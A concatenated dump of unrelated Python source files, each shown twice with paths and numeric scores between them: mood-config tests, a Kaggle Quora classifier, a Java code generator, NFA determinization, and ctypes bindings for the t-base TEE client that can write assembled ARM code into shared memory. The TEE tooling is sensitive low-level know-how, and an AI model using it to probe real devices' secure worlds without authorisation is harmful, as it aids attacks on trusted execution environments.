self.assertEqual(m.moods[4].name, 'rad') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) self.assertEqual(m.moods[4].color, DEFAULT_COLOR_PALETTE[4]) def test_custom_moods(self): """Here we test that custom moods have correctly computed boundaries.""" moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), ] m = MoodConfig(moods) self.assertEqual(m.moods[0].name, 'bad') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[1].name, 'almost bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[2].name, 'neutral') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[3].name, 'almost good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, (3.5, 4.5)) self.assertEqual(m.moods[4].name, 'good') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) def test_validation(self): """Test wrong mood lists.""" # Only 1 mood moods = [ (1, 'bad', 'red'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Bad formatting moods = [ ('bad',), ('almost bad',), ('neutral',), ('almost good',), ('good',), ] with self.assertRaises(ValueError): MoodConfig(moods) # Missing level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (4, 'good'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), (6, 'rad'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong palette colors = [ 'red', ] with self.assertRaises(ValueError): MoodConfig(DEFAULT_MOODS, colors) def test_custom_colors(self): """Test custom color palette.""" colors = [ 'black', 'red', 'orange', 'yellow', 'green', ] m = MoodConfig(DEFAULT_MOODS, colors) self.assertEqual(m.moods[0].color, 'black') self.assertEqual(m.moods[1].color, 'red') self.assertEqual(m.moods[2].color, 'orange') self.assertEqual(m.moods[3].color, 'yellow') self.assertEqual(m.moods[4].color, 'green') def test_get_mood(self): """Test getter by mood name.""" m = MoodConfig() expected = Mood('good', 4, '#4CA369', (3.5, 4.5)) self.assertEqual(m.get('good'), expected) def test_get_mood_missing(self): m = MoodConfig() with self.assertRaises(MoodNotFound): m.get("this does not exist")
0.834036
0.514705
import numpy as np # linear algebra np.set_printoptions(threshold=np.nan) import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) print(os.listdir("../input/embeddings")) print(os.listdir("../input/embeddings/GoogleNews-vectors-negative300")) # Any results you write to the current directory are saved as output. import gensim from gensim.utils import simple_preprocess from keras.preprocessing.sequence import pad_sequences def load_x_from_df(df,model): sequences = [] for question_text in df['question_text'].values: tokens = simple_preprocess(question_text) sentence = [] for word in tokens: # print(model.wv[word]) if word in model.wv.vocab: sentence.append(model.wv[word]) if len(sentence) == 0: sentence = np.zeros((max_len,300)) sequences.append(np.mean(sentence,axis=1)) x = pad_sequences(sequences,dtype='float32', maxlen=max_len) x = x.reshape(x.shape[0],1,x.shape[1]) return x print('loading word2vec model...') model = gensim.models.KeyedVectors.load_word2vec_format('../input/embeddings/GoogleNews-vectors-negative300/GoogleNews-vectors-negative300.bin', binary=True) df = pd.read_csv('../input/train.csv') print('columns:',df.columns) pd.set_option('display.max_columns',None) print('df head:',df.head()) print('example of the question text values:',df['question_text'].head().values) print('what values contains target:',df.target.unique()) print('loading sequences...') max_len = df['question_text'].apply(lambda x:len(x)).max() print('max length of sequences:',max_len) print('creating sequences') x = load_x_from_df(df,model) print(x.shape) y = df.target.values print(y.shape) print('Creating model...') #inpiration from : https://github.com/keras-team/keras/blob/master/examples/imdb_fasttext.py from keras.models import Sequential from keras.layers import Dense from keras.layers import Masking from keras.layers import GlobalAveragePooling1D from keras.callbacks import EarlyStopping model = Sequential() model.add(Masking(input_shape=(x.shape[1],x.shape[2]))) model.add(GlobalAveragePooling1D()) model.add(Dense(1,activation='sigmoid')) model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy']) print(model.summary()) print('fiting model...') history = model.fit(x,y,validation_split=0.2,epochs=100, callbacks=[EarlyStopping(patience=20)]) print('model score:',model.evaluate(x,y)) import matplotlib.pyplot as plt plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.show()
kaggle-ml/quora/kernel.py
import numpy as np # linear algebra np.set_printoptions(threshold=np.nan) import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) print(os.listdir("../input/embeddings")) print(os.listdir("../input/embeddings/GoogleNews-vectors-negative300")) # Any results you write to the current directory are saved as output. import gensim from gensim.utils import simple_preprocess from keras.preprocessing.sequence import pad_sequences def load_x_from_df(df,model): sequences = [] for question_text in df['question_text'].values: tokens = simple_preprocess(question_text) sentence = [] for word in tokens: # print(model.wv[word]) if word in model.wv.vocab: sentence.append(model.wv[word]) if len(sentence) == 0: sentence = np.zeros((max_len,300)) sequences.append(np.mean(sentence,axis=1)) x = pad_sequences(sequences,dtype='float32', maxlen=max_len) x = x.reshape(x.shape[0],1,x.shape[1]) return x print('loading word2vec model...') model = gensim.models.KeyedVectors.load_word2vec_format('../input/embeddings/GoogleNews-vectors-negative300/GoogleNews-vectors-negative300.bin', binary=True) df = pd.read_csv('../input/train.csv') print('columns:',df.columns) pd.set_option('display.max_columns',None) print('df head:',df.head()) print('example of the question text values:',df['question_text'].head().values) print('what values contains target:',df.target.unique()) print('loading sequences...') max_len = df['question_text'].apply(lambda x:len(x)).max() print('max length of sequences:',max_len) print('creating sequences') x = load_x_from_df(df,model) print(x.shape) y = df.target.values print(y.shape) print('Creating model...') #inpiration from : https://github.com/keras-team/keras/blob/master/examples/imdb_fasttext.py from keras.models import Sequential from keras.layers import Dense from keras.layers import Masking from keras.layers import GlobalAveragePooling1D from keras.callbacks import EarlyStopping model = Sequential() model.add(Masking(input_shape=(x.shape[1],x.shape[2]))) model.add(GlobalAveragePooling1D()) model.add(Dense(1,activation='sigmoid')) model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy']) print(model.summary()) print('fiting model...') history = model.fit(x,y,validation_split=0.2,epochs=100, callbacks=[EarlyStopping(patience=20)]) print('model score:',model.evaluate(x,y)) import matplotlib.pyplot as plt plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.show()
0.55447
0.245384
from typing import List # MONAD = "Reader" MONAD = "State" PARAM = MONAD[0] def generic(i: int) -> str: return chr(i + ord("A")) def arg(i: int) -> str: return chr(i + ord("a")) def arg2(i: int) -> str: return arg(i) + "2" def generics(i: int) -> List[str]: return [generic(i) for i in range(0, i + 1)] def result_generics(i: int) -> List[str]: res = list(PARAM) res.extend(generics(i)) return res def wrap(cs: List[str]) -> str: return "<" + ", ".join(cs) + ">" def monadic(i: int) -> str: return MONAD + wrap([PARAM, generic(i)]) def liftN(i: int) -> str: return "lift%d" % i def functionN(i: int) -> str: return "Function%d" % i def func_args(i: int) -> str: args = [f"{functionN(i)}{wrap(generics(i))} func"] args.extend(monadic_args(i)) return ", ".join(args) def monadic_arg(i: int) -> str: return f"{monadic(i)} {arg(i)}" def monadic_args(n: int) -> List[str]: return [monadic_arg(i) for i in range(0, n)] def curried_type(n: int) -> str: def ty(i: int) -> str: if i + 1 == n: return f"Function1<{generic(i)}, {generic(i+1)}>" else: return f"Function1<{generic(i)}, {ty(i+1)}>" return ty(0) def applies(i: int) -> str: lst = ["func"] lst.extend([f"apply{a}" for a in curried_args(i)]) return ".".join(lst) def curried_args(n: int) -> List[str]: return [f"({arg2(i)})" for i in range(0, n)] def curried_value(i: int) -> str: args = curried_args(i) args.append(applies(i)) return " -> ".join(args) def curried(i: int) -> str: return f"{curried_type(i)} curried = {curried_value(i)};" def return_val(i: int) -> str: assert i >= 0 if i == 0: return f"{arg(i)}.map(curried)" else: return f"ap({return_val(i-1)}, {arg(i)})" for i in range(2, 9): print( "public static", wrap(result_generics(i)), monadic(i), liftN(i), "(", func_args(i), "){", ) print(curried(i)) print(f"return {return_val(i-1)};") print("}")
GenCode.py
from typing import List # MONAD = "Reader" MONAD = "State" PARAM = MONAD[0] def generic(i: int) -> str: return chr(i + ord("A")) def arg(i: int) -> str: return chr(i + ord("a")) def arg2(i: int) -> str: return arg(i) + "2" def generics(i: int) -> List[str]: return [generic(i) for i in range(0, i + 1)] def result_generics(i: int) -> List[str]: res = list(PARAM) res.extend(generics(i)) return res def wrap(cs: List[str]) -> str: return "<" + ", ".join(cs) + ">" def monadic(i: int) -> str: return MONAD + wrap([PARAM, generic(i)]) def liftN(i: int) -> str: return "lift%d" % i def functionN(i: int) -> str: return "Function%d" % i def func_args(i: int) -> str: args = [f"{functionN(i)}{wrap(generics(i))} func"] args.extend(monadic_args(i)) return ", ".join(args) def monadic_arg(i: int) -> str: return f"{monadic(i)} {arg(i)}" def monadic_args(n: int) -> List[str]: return [monadic_arg(i) for i in range(0, n)] def curried_type(n: int) -> str: def ty(i: int) -> str: if i + 1 == n: return f"Function1<{generic(i)}, {generic(i+1)}>" else: return f"Function1<{generic(i)}, {ty(i+1)}>" return ty(0) def applies(i: int) -> str: lst = ["func"] lst.extend([f"apply{a}" for a in curried_args(i)]) return ".".join(lst) def curried_args(n: int) -> List[str]: return [f"({arg2(i)})" for i in range(0, n)] def curried_value(i: int) -> str: args = curried_args(i) args.append(applies(i)) return " -> ".join(args) def curried(i: int) -> str: return f"{curried_type(i)} curried = {curried_value(i)};" def return_val(i: int) -> str: assert i >= 0 if i == 0: return f"{arg(i)}.map(curried)" else: return f"ap({return_val(i-1)}, {arg(i)})" for i in range(2, 9): print( "public static", wrap(result_generics(i)), monadic(i), liftN(i), "(", func_args(i), "){", ) print(curried(i)) print(f"return {return_val(i-1)};") print("}")
0.629888
0.536738
__author__ = "<NAME>" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __copyright__ = "Copyright (C) 2020, Nokia" __license__ = "BSD-3" from pybgl.automaton import Automaton, alphabet, add_vertex, add_edge, delta, set_final from pybgl.nfa import Nfa, initials, is_final, sigma def moore_determination(nfa :Nfa, dfa :Automaton = None, complete :bool = True) -> Automaton: """ Converts the input NFA into a DFA. The output DFA has a state for every *reachable* subset of states in the input NFA. In the worst case, there will be an exponential increase in the number of states. Args: nfa: An `Nfa` instance. dfa: Pass `None` or a reference to an empty `Automaton` instance. complete: Pass `True` to build the complete automaton (original algorithm). Pass `False` to build a smaller automaton (this save the "trash" state and its corresponding input transitions). Returns: The corresponding `Automaton` instance. """ def dfa_add_state(qs): q = map_qs_q[qs] = add_vertex(dfa) if any(is_final(_, nfa) for _ in qs): set_final(q, dfa) return q full_sigma = alphabet(nfa) if dfa is None: dfa = Automaton() map_qs_q = dict() # Maps subset of states of nfa with the corresponding dfa state. q0s = frozenset(initials(nfa)) unprocessed_qs = set() # Keeps track of qs for which delta is not yet installed in dfa unprocessed_qs.add(q0s) q0 = dfa_add_state(q0s) while unprocessed_qs: qs = unprocessed_qs.pop() q = map_qs_q[qs] sigma_ = ( full_sigma if complete else set.union(*[sigma(q, nfa) for q in qs]) if qs else set() ) for a in sigma_: rs = ( frozenset(set.union(*[delta(q, a, nfa) for q in qs])) if qs else frozenset() ) r = map_qs_q.get(rs) if r is None: r = dfa_add_state(rs) unprocessed_qs.add(rs) add_edge(q, r, a, dfa) return dfa
pybgl/moore_determination.py
__author__ = "<NAME>" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __copyright__ = "Copyright (C) 2020, Nokia" __license__ = "BSD-3" from pybgl.automaton import Automaton, alphabet, add_vertex, add_edge, delta, set_final from pybgl.nfa import Nfa, initials, is_final, sigma def moore_determination(nfa :Nfa, dfa :Automaton = None, complete :bool = True) -> Automaton: """ Converts the input NFA into a DFA. The output DFA has a state for every *reachable* subset of states in the input NFA. In the worst case, there will be an exponential increase in the number of states. Args: nfa: An `Nfa` instance. dfa: Pass `None` or a reference to an empty `Automaton` instance. complete: Pass `True` to build the complete automaton (original algorithm). Pass `False` to build a smaller automaton (this save the "trash" state and its corresponding input transitions). Returns: The corresponding `Automaton` instance. """ def dfa_add_state(qs): q = map_qs_q[qs] = add_vertex(dfa) if any(is_final(_, nfa) for _ in qs): set_final(q, dfa) return q full_sigma = alphabet(nfa) if dfa is None: dfa = Automaton() map_qs_q = dict() # Maps subset of states of nfa with the corresponding dfa state. q0s = frozenset(initials(nfa)) unprocessed_qs = set() # Keeps track of qs for which delta is not yet installed in dfa unprocessed_qs.add(q0s) q0 = dfa_add_state(q0s) while unprocessed_qs: qs = unprocessed_qs.pop() q = map_qs_q[qs] sigma_ = ( full_sigma if complete else set.union(*[sigma(q, nfa) for q in qs]) if qs else set() ) for a in sigma_: rs = ( frozenset(set.union(*[delta(q, a, nfa) for q in qs])) if qs else frozenset() ) r = map_qs_q.get(rs) if r is None: r = dfa_add_state(rs) unprocessed_qs.add(rs) add_edge(q, r, a, dfa) return dfa
0.790732
0.353847
import ctypes import io import os import struct import sys from contextlib import contextmanager from . import mcclient_const as const from . import mcclient_types as types if 'sphinx' in sys.modules: client = None else: client = types.load_library() if client is None: raise ImportError("ERROR: fail to load the dynamic library.") class Error(Exception): """ This exception is raised when a function doesn't return successfully. """ def __init__(self, code): self._code = code @property def code(self): """ The error code returned by the function. """ return self._code def __str__(self): special = ["NO_NOTIFICATION", "INFO_NOTIFICATION"] for name in dir(const): if getattr(const, name) == self._code \ and (name.startswith("ERR_") or name in special): return name return "ERR_UNKNOWN" class Device(object): """ Initialize a session with a t-base device. Args: device_id (:obj:`int`): Identifier for the t-base device to be used. DEVICE_ID_DEFAULT refers to the default device. This class can be used with a Python "with statement", meaning that it will automatically call :func:`Device.open` on enter and :func:`Device.close` on exit. :: with Device() as dev: # do something with the device """ def __init__(self, id=const.DEVICE_ID_DEFAULT): self._id = id @property def id(self): """ The identifier for the t-base device used. """ return self._id def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open a new connection to a t-base device. It initializes all device specific resources required to communicate with an t-base instance located on the specified device in the system. Raises: :class:`Error`: See below the possible error codes: - ERR_INVALID_OPERATION if device already opened - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_UNKNOWN_DEVICE when device_id is unknown - ERR_INVALID_DEVICE_FILE if kernel module under /dev/mobicore cannot be opened """ res = client.mcOpenDevice(self._id) if res != const.OK: raise Error(res) def close(self): """ Close the connection to a t-base device. When closing a device, active sessions have to be closed beforehand. Resources associated with the device will be released. The device may be opened again after it has been closed. Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_SESSION_PENDING when a session is still open - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ res = client.mcCloseDevice(self._id) if res != const.OK: raise Error(res) @contextmanager def buffer(self, len): """ Instantiate a new memory buffer. Args: len (:obj:`int`): Length of the block in bytes Yields: :class:`Buffer`: The allocated block of memory This method can be used with a Python "with statement", meaning that it will automatically call :func:`Device.malloc` on enter and :func:`Device.free` on exit. :: with dev.buffer(0x1000) as tci: # do something with the buffer """ buf = self.malloc(len) yield buf self.free(buf) def malloc(self, len): """ Allocate a block of memory. The driver allocates a contiguous block of memory which can be used as WSM. This implicates that the allocated memory is always aligned to 4K. Args: len (:obj:`int`): Length of the block in bytes Returns: :class:`Buffer`: The allocated block of memory Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_NO_FREE_MEMORY if no more contiguous memory is available in this size or for this process """ buf = ctypes.POINTER(ctypes.c_uint8)() res = client.mcMallocWsm(self._id, 0, len, ctypes.byref(buf), 0) if res != const.OK: raise Error(res) ptr = ctypes.cast(buf, ctypes.c_void_p) return Buffer(ptr, len) def free(self, buf): """ Free a block of memory. The driver will free a block of memory previously allocated. Args: buf (:class:`Buffer`): The memory block to be freed Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_FREE_MEMORY_FAILED on failures """ ptr = ctypes.cast(buf._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcFreeWsm(self._id, ptr) if res != const.OK: raise Error(res) buf.close() def version(self): """ Get t-base version information of a device. Returns: :obj:`dict`: t-base version info :: { 'productId': b't-base-EXYNOS64-Android-302A-V015-681_681', 'versionMci': 65536, 'versionSo': 131074, 'versionMclf': 131077, 'versionContainer': 131073, 'versionMcConfig': 2, 'versionTlApi': 65552, 'versionDrApi': 65538, 'versionCmp': 0 } Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device is not open - INVALID_PARAMETER if a parameter is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ info = types.mcVersionInfo() res = client.mcGetMobiCoreVersion(self._id, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) class Trustlet(object): """ Initialize a session to a Trusted Application. Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`bytes`): Buffer containing the TA binary This class can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.open` on enter and :func:`Trustlet.close` on exit. :: with Trustlet(dev, tci, buf) as app: # do something with the trustlet """ @staticmethod def uuid(dev, tci, uuid): """ Initialize a session to a TA using its UUID. Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`str`): The Trusted Application's UUID Returns: :class:`Trustlet`: A Trusted Application session """ path = "/vendor/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): path = "/system/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): raise IOError("Could not find the trustlet") with open(path, "rb") as fd: return Trustlet(dev, tci, fd.read()) def __init__(self, dev, tci, buf): self._ses = types.mcSessionHandle() self._ses.device_id = dev.id self._tci = tci self._buf = buf @property def id(self): """ The identifier of the Trusted Application session. """ return self._ses.sessionId def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open a new session to a Trusted Application (Trustlet). The trustlet will be loaded from the memory buffer. Write MCP open message to buffer and notify t-base about the availability of a new command. Waits till t-base responds with the new session ID (stored in the MCP buffer). Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon socket occur - ERR_UNKNOWN_DEVICE when daemon returns an error - ERR_TRUSTED_APPLICATION_NOT_FOUND when TA cannot be loaded """ ta = (ctypes.c_uint8 * len(self._buf)).from_buffer_copy(self._buf) ta_ptr = ctypes.cast(ta, ctypes.POINTER(ctypes.c_uint8)) tci_ptr = ctypes.cast(self._tci._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcOpenTrustlet(ctypes.byref(self._ses), 0, ta_ptr, len(self._buf), tci_ptr, self._tci._len) if res != const.OK: raise Error(res) def close(self): """ Close a Trusted Application session. Closes the specified t-base session. The call will block until the session has been closed. Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_INVALID_DEVICE_FILE when daemon cannot open trustlet file """ res = client.mcCloseSession(ctypes.byref(self._ses)) if res != const.OK: raise Error(res) def notify(self): """ Notify a session. Notifies the session end point about available message data. Corresponding errors can only be received by :func:`Trustlet.wait_notification`. A session has to be opened in advance. Raises: :class:`Error`: See below the possible error codes: - DRV_INVALID_PARAMETER if session parameter is invalid - DRV_ERR_UNKNOWN_SESSION when session id is invalid - DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcNotify(self._ses) if res != const.OK: raise Error(res) def wait_notification(self, timeout=const.INFINITE_TIMEOUT): """ Wait for a notification. Wait for a notification issued by t-base for a specific session. The timeout parameter specifies the number of milliseconds the call will wait for a notification. If the caller passes 0 as timeout value the call will immediately return. If timeout value is below 0 the call will block until a notification for the session has been received. Warning: If timeout is below 0, the call will block. Caller has to trust the other side to send a notification to wake him up again. Args: timeout (:obj:`int`): Time in milliseconds to wait Raises: :class:`Error`: See below the possible error codes: - ERR_TIMEOUT if no notification arrived in time - INFO_NOTIFICATION if a problem with the session was encountered. Get more details with :func:`Trustlet.error()`. - ERR_NOTIFICATION if a problem with the socket occurred - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcWaitNotification(ctypes.byref(self._ses), timeout) if res != const.OK: raise Error(res) @contextmanager def share(self, buf): """ Share an additional buffer with the Trusted Application. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Yields: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } This method can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.map` on enter and :func:`Trustlet.unmap` on exit. :: with app.share(buf): # do something with the additional buffer """ map = self.map(buf) yield map self.unmap(buf, map) def map(self, buf): """ Map additional bulk buffer between a Client Application (CA) and the Trusted Application (TA) for a session. Memory allocated in user space of the CA can be mapped as additional communication channel (besides TCI) to the Trusted Application. Limitation of the Trusted Application memory structure apply: only 6 chunks can be mapped with a maximum chunk size of 1 MiB each. Warning: It is up to the application layer (CA) to inform the Trusted Application about the additional mapped bulk memory. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Returns: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf is already uses as bulk buffer or when registering the buffer failed """ info = types.mcBulkMap() res = client.mcMap(ctypes.byref(self._ses), buf._ptr, buf._len, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) def unmap(self, buf, info): """ Remove additional mapped bulk buffer between Client Application (CA) and the Trusted Application (TA) for a session. Warning: The bulk buffer will immediately be unmapped from the session context. The application layer (CA) must inform the TA about unmapping of the additional bulk memory before making this call. Args: buf (:class:`Buffer`): Memory buffer shared with the TA info (:obj:`dict`): Information about the mapped bulk buffer Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf was not registered earlier or when unregistering failed """ info = types.mcBulkMap(info) res = client.mcUnmap(ctypes.byref(self._ses), buf._ptr, ctypes.byref(info)) if res != const.OK: raise Error(res) def error(self): """ Get additional error information of the last error that occurred on a session. After the request the stored error code will be deleted. Returns: :obj:`int`: >0 Trusted Application has terminated itself with this value, <0 Trusted Application is dead because of an error within t-base (e.g. Kernel exception) """ err = ctypes.c_int32() res = client.mcGetSessionErrorCode(ctypes.byref(self._ses), ctypes.byref(err)) if res != const.OK: raise Error(res) return err.value class Buffer(io.RawIOBase): """ This class exposes a memory memory buffer as a raw I/O stream object. It use provide convenience functions to read/write common data types. Warning: The constructor of this class should never be called directly. If you need to allocate a new buffer, use :func:`Device.malloc` instead. """ def __init__(self, ptr, len): self._ptr = ptr self._len = len self._pos = 0 def seek(self, offset, whence=0): self._checkClosed() if whence == io.SEEK_SET: self._pos = offset elif whence == io.SEEK_CUR: self._pos += offset elif whence == io.SEEK_END: self._pos = self._len + offset self._pos = max(0, min(self._len, self._pos)) return self._pos def truncate(self, size=None): self._checkClosed() if size is None: size = self._pos self._len = max(0, size) self.seek(self._pos) return self._len def seekable(self): return True def readinto(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos b[:size] = (ctypes.c_char * size).from_address(addr).raw self._pos += size return size def readable(self): return True def write(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos (ctypes.c_char * size).from_address(addr).raw = b[:size] self._pos += size return size def writable(self): return True def skip(self, size): """ Move stream position forward of size bytes. Args: size (:obj:`int`): Number of bytes to skip """ self.seek(size, io.SEEK_CUR) def read_byte(self, signed=False): """ Read the byte at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<b" if signed else "<B" return struct.unpack(fmt, self.read(1))[0] def read_word(self, signed=False): """ Read the word (2-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<h" if signed else "<H" return struct.unpack(fmt, self.read(2))[0] def read_dword(self, signed=False): """ Read the double word (4-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<i" if signed else "<I" return struct.unpack(fmt, self.read(4))[0] def read_qword(self, signed=False): """ Read the quadro word (8-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<q" if signed else "<Q" return struct.unpack(fmt, self.read(8))[0] def read_float(self): """ Read the float (4-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<f", self.read(4))[0] def read_double(self): """ Read the double (8-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<d", self.read(8))[0] def read_string(self): """ Read the NULL-terminated string at the current position. Returns: :obj:`str`: The string read """ val = b"" c = self.read(1) while c != b"\x00": val += c c = self.read(1) return val def write_byte(self, val, signed=False): """ Write a byte at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<b" if signed else "<B" self.write(struct.pack(fmt, val)) def write_word(self, val, signed=False): """ Write a word (2-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<h" if signed else "<H" self.write(struct.pack(fmt, val)) def write_dword(self, val, signed=False): """ Write a double word (4-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<i" if signed else "<I" self.write(struct.pack(fmt, val)) def write_qword(self, val, signed=False): """ Write a quadro word (8-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<q" if signed else "<Q" self.write(struct.pack(fmt, val)) def write_float(self, val): """ Write a float (4-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<f", val)) def write_double(self, val): """ Write a double (8-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<d", val)) def write_string(self, val): """ Write a NULL-terminated string at the current position. Args: val (:obj:`str`): The string to write """ self.write(val) self.write(b"\x00") def hexdump(self, size=-1): """ Display an hex dump of the size bytes at the current position. Args: size (:obj:`int`): The number of bytes to dump (-1 = all) """ if size == -1: size = self._len - self._pos for i in range(0, size, 0x10): hex_dmp = "0x{:08x}:".format(i) chr_dmp = " | " for j in range(min(0x10, size - i)): hex_chr = self.read(1)[0] hex_dmp += " {:02x}".format(hex_chr) if 0x20 <= hex_chr <= 0x7E: chr_dmp += chr(hex_chr) else: chr_dmp += "." hex_dmp = hex_dmp.ljust(60, " ") print(hex_dmp + chr_dmp) def assemble(self, code, thumb=True): """ Assemble code using Keystone and write it at the current position. Args: code (:obj:`str`): the code to assemble thumb (:obj:`bool`): True if Thumb, False otherwise Returns: :obj:`int`: the number of bytes written """ from keystone import Ks, KS_ARCH_ARM, KS_MODE_ARM, KS_MODE_THUMB ks = Ks(KS_ARCH_ARM, KS_MODE_THUMB if thumb else KS_MODE_ARM) addr = self._ptr.value bs, size = ks.asm(code, addr) self.write(bytes(bytearray(bs))) return len(bs) def disassemble(self, size, thumb=True): """ Display the bytes disassembled using Capstone at the current position. Args: size (:obj:`int`): the number of bytes to disassemble thumb (:obj:`bool`): True if Thumb, False otherwise """ from capstone import Cs, CS_ARCH_ARM, CS_MODE_ARM, CS_MODE_THUMB cs = Cs(CS_ARCH_ARM, CS_MODE_THUMB if thumb else CS_MODE_ARM) addr = self._ptr.value for insn in cs.disasm(self.read(size), addr): insn_info = insn.address, insn.mnemonic, insn.op_str print("{:08x}:\t{} {}".format(insn_info))
bindings/mcclient/mcclient.py
import ctypes import io import os import struct import sys from contextlib import contextmanager from . import mcclient_const as const from . import mcclient_types as types if 'sphinx' in sys.modules: client = None else: client = types.load_library() if client is None: raise ImportError("ERROR: fail to load the dynamic library.") class Error(Exception): """ This exception is raised when a function doesn't return successfully. """ def __init__(self, code): self._code = code @property def code(self): """ The error code returned by the function. """ return self._code def __str__(self): special = ["NO_NOTIFICATION", "INFO_NOTIFICATION"] for name in dir(const): if getattr(const, name) == self._code \ and (name.startswith("ERR_") or name in special): return name return "ERR_UNKNOWN" class Device(object): """ Initialize a session with a t-base device. Args: device_id (:obj:`int`): Identifier for the t-base device to be used. DEVICE_ID_DEFAULT refers to the default device. This class can be used with a Python "with statement", meaning that it will automatically call :func:`Device.open` on enter and :func:`Device.close` on exit. :: with Device() as dev: # do something with the device """ def __init__(self, id=const.DEVICE_ID_DEFAULT): self._id = id @property def id(self): """ The identifier for the t-base device used. """ return self._id def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open 